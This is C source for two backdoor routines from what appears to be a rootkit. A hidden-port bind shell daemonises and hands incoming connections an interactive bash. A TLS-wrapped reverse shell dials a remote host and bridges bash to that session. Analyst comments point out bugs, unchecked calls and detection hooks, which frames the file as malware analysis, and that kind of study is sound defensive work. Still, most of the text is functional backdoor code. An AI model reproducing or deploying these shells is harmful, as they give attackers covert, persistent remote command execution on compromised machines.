/*
 * bindshell - listen on a TCP port and hand every accepted connection an
 * interactive /bin/bash whose stdin/stdout/stderr are the socket itself.
 *
 * Analyst notes (only what the visible code establishes):
 *  - The listening port comes from the compile-time macro _HIDE_PORT_, the
 *    working directory from _H4X_PATH_ and the backlog from MAXLISTEN; none
 *    of them are defined on this page.
 *  - socket()/bind()/listen() failures go to error_ret() (definition not
 *    shown, so whether it returns or terminates is unconfirmed).
 *  - The process daemonises with fork()+setsid(); the parent prints the
 *    child PID and exits. fork() == -1 also takes the parent branch, so a
 *    failed fork prints "PID = -1" and exits without a daemon.
 *  - SIGCHLD is set to SIG_IGN, so exited children are reaped automatically
 *    and never appear as zombies.
 *  - enterpass(cli) runs before the exec; presumably an access gate on the
 *    connection, but its body is not on this page.
 *  - argv and envp passed to execve are not declared here; assumed to be
 *    file-scope globals.
 *  - Detection hooks: a long-lived process listening on _HIDE_PORT_ with
 *    cwd _H4X_PATH_, and bash processes whose fds 0-2 are a TCP socket
 *    rather than a pty.
 *  - The parent never close()s cli after fork(), so accepted descriptors
 *    accumulate in the listener until the fd table is exhausted.
 *  - fd is declared but never used; clilen is declared int although
 *    accept() takes a socklen_t pointer.
 */
void bindshell() {
    struct sockaddr_in sockaddr,cliaddr;   /* sockaddr is not zeroed; sin_zero stays uninitialised */
    int sock,cli,clilen,pid,child;
    FILE *fd;
    sockaddr.sin_family = AF_INET;
    sockaddr.sin_port = htons(_HIDE_PORT_);
    sockaddr.sin_addr.s_addr = INADDR_ANY;   /* binds on every interface */
    sock=socket(AF_INET, SOCK_STREAM, 0);
    if(sock < 0) error_ret("socket");
    if(bind(sock,(struct sockaddr *)&sockaddr,sizeof(sockaddr))<0) error_ret("bind");
    if(listen(sock,MAXLISTEN)<0) error_ret("listen");
    /* Daemonise: anything but 0 (including -1 on failure) is treated as the parent. */
    if((pid=fork())!=0){
        printf("Daemon running with PID = %i\n",pid);
        exit(0);
    }
    setsid();
    chdir(_H4X_PATH_);
    umask(0);
    close(0);                     /* only stdin is closed; stdout/stderr stay open */
    signal(SIGCHLD, SIG_IGN);     /* auto-reap children, no wait() needed */
    while(1){
        clilen=sizeof(cliaddr);
        cli=accept(sock,(struct sockaddr *)&cliaddr,&clilen);
        if(cli<0) continue;
        if((child=fork())==0){
            close(sock);
            /* Child: socket becomes stdin, stdout and stderr of the shell. */
            dup2(cli,0);
            dup2(cli,1);
            dup2(cli,2);
            enterpass(cli);
            execve("/bin/bash", argv, envp);
            /* Only reached if execve fails. child is 0 here, so close(child)
             * closes fd 0 (the socket); the child then re-enters the accept()
             * loop on the listener it already closed, where accept() keeps
             * returning -1 and the loop spins. */
            close(child);
            close(cli);
        }
        /* Parent: cli is intentionally left open here by the original; see notes. */
    }
    return;
}
/*
 * backconnect - spawn a reverse ("back-connect") shell.
 *
 * Forks a child that dials addr:port over TCP, wraps the socket in TLS
 * (OpenSSL context from InitCTX(), not shown) and bridges /bin/bash to the
 * TLS session through a pair of pipes. The calling process returns at once.
 *
 * Analyst notes (only what the visible code establishes):
 *  - port is stored into sin_port without htons(); callers are therefore
 *    expected to pass it already in network byte order - unconfirmed, the
 *    callers are not on this page.
 *  - socket() and SSL_new() results are not checked. A failed connect() is
 *    silent: the child simply reaches close(child)/_exit(0).
 *  - enterpass() receives an SSL* here but an int fd in bindshell(); its
 *    prototype is not visible, so note the discrepancy rather than assume.
 *  - The PARENT_*/CHILD_* macros are #defined in the middle of the function
 *    and remain defined for the rest of the translation unit.
 *  - In the grandchild, CHILD_READ and CHILD_WRITE are close()d before
 *    dup2(CHILD_WRITE,2) and remap_pipe_stdin_stdout() use them, so those
 *    calls operate on already-closed descriptors (remap_pipe_stdin_stdout
 *    and read_write are not shown; what they do with this is unknown).
 *  - If the outer fork() returns -1, neither branch matches and the
 *    function returns normally with no indication of failure.
 *  - Detection hooks: an outbound TLS session from a process whose bash
 *    child has fds 0-2 on pipes instead of a tty, with SIGCHLD ignored;
 *    DEBUG builds print "---child PID:<n>" to stdout.
 */
void backconnect(struct in_addr addr, u_short port) {
    int child;
    signal(SIGCHLD, SIG_IGN);      /* auto-reap; the parent never waits */
    if((child=fork())==0){
        /* Child: owns the network side. The original comment reads
         * "For magic stdin stdout stderr". */
        //printf("hello");
        struct sockaddr_in sockaddr;   /* not zeroed; sin_zero stays uninitialised */
        int sock;
        //FILE *fd;
        //char *newline;
        //char buf[1028];
        SSL_CTX *ctx;
        SSL *ssl;
        ctx = InitCTX();
        sockaddr.sin_family = AF_INET;
        sockaddr.sin_addr = addr;
        sockaddr.sin_port = port;      /* no htons(): see analyst notes */
        sock = socket(AF_INET, SOCK_STREAM, 0);   /* return value unchecked */
        if (connect(sock, (struct sockaddr*)&sockaddr, sizeof(sockaddr)) == 0) {
            ssl = SSL_new(ctx);        /* return value unchecked */
            SSL_set_fd(ssl,sock);
            sock = SSL_get_fd(ssl);    /* reads back the same descriptor */
            if ( SSL_connect(ssl) == -1 )
                ERR_print_errors_fp(stderr);
            else {
                enterpass(ssl);
                int writepipe[2] = {-1,-1}, /* parent -> child */
                    readpipe [2] = {-1,-1}; /* child -> parent */
                pid_t childpid;
                /*------------------------------------------------------------------------
                 * CREATE THE PAIR OF PIPES
                 *
                 * Pipes have two ends but just one direction: to get a two-way
                 * conversation you need two pipes. It's an error if we cannot make
                 * them both, and we define these macros for easy reference.
                 */
                writepipe[0] = -1;     /* redundant: already initialised to -1 above */
                if ( pipe(readpipe) < 0 || pipe(writepipe) < 0 ) {
                    /* FATAL: cannot create pipe */
                    /* close readpipe[0] & [1] if necessary */
                    /* NOTE(review): the error branch is empty; execution falls
                     * through with one or both pipes unusable. */
                }
                /* These macros are function-local by intent but stay defined
                 * for the rest of the translation unit. */
#define PARENT_READ readpipe[0]
#define CHILD_WRITE readpipe[1]
#define CHILD_READ writepipe[0]
#define PARENT_WRITE writepipe[1]
                signal(SIGCHLD, SIG_IGN);
                if ( (childpid = fork()) < 0) {
                    /* FATAL: cannot fork child */
                    /* NOTE(review): empty branch; falls through to close(sock). */
                }
                else if ( childpid == 0 ) /* in the child */ {
                    close(PARENT_WRITE);
                    close(PARENT_READ);
                    //dup2(CHILD_READ, 0);
                    close(CHILD_READ);
                    //dup2(CHILD_WRITE, 1);
                    close(CHILD_WRITE);
                    /* CHILD_WRITE was closed just above, so this dup2 targets
                     * a closed descriptor. */
                    dup2(CHILD_WRITE,2);//for error
                    remap_pipe_stdin_stdout(CHILD_READ,CHILD_WRITE);
                    /* do child stuff */
                    //read_write(ssl,sock);
                    execve("/bin/bash", argv, envp);
                    /* Only reached if execve fails; childpid is 0 here, so
                     * close(childpid) closes fd 0. */
                    //printf("bash close");
                    close(childpid);
                    _exit(0);
                }
                else /* in the parent */ {
                    close(CHILD_READ);
                    close(CHILD_WRITE);
                    //dup2(PARENT_READ, 0);
                    //dup2(PARENT_WRITE, 1);
                    remap_pipe_stdin_stdout(PARENT_READ,PARENT_WRITE);
                    /* do parent stuff: read_write() is presumably the relay
                     * between the pipes and the TLS session - not shown. */
                    read_write(ssl,sock);
                    //wait();
                }
                close(sock);
                SSL_CTX_free(ctx);     /* ssl itself is never SSL_free()d */
            }
        }
        //return;
        /* child is 0 in this branch, so close(child) closes fd 0. */
        close(child);
        _exit(0);
    }else if(child>0){
#ifdef DEBUG
        printf("---child PID:");
        printf("%d",child);
        printf("\n");
#endif
        return;
    }
    /* fork() == -1 ends up here: returns without reporting the failure. */
    return;
}